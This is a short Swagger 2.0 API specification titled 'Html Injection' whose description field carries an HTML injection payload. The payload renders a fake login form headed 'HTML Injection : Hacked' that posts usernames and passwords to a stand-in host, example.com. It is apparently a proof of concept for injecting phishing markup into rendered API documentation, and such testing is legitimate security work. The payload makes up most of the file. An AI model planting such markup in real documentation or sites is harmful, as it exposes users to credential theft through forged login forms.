swagger: '2.0'
info:
  version: 1.0.0
  title: Html Injection 
  description: '<div class="login-form">
    <div class="heading">
        <h1 style="font-size:50px">HTML Injection : Hacked </h1>
    </div>
  */  <div class="form-container">
        <form action="https://example.com/login" method="post" class="form-signin">
            <div class="form-group">
                <label for="username">Username</label>
                <textarea rows="2" cols="15"></textarea>

            </div>
            <div class="form-group">
                <label for="password">Password</label>
                <textarea rows="2" cols="15"></textarea>

            </div>
            <div class="form-group">
                <button type="submit" class="btn btn-default">Login</button>
            </div>
        </form>
    </div>*/
</div>'
paths:
  /:
    post:
      responses:
        '200':
          description: Login successful
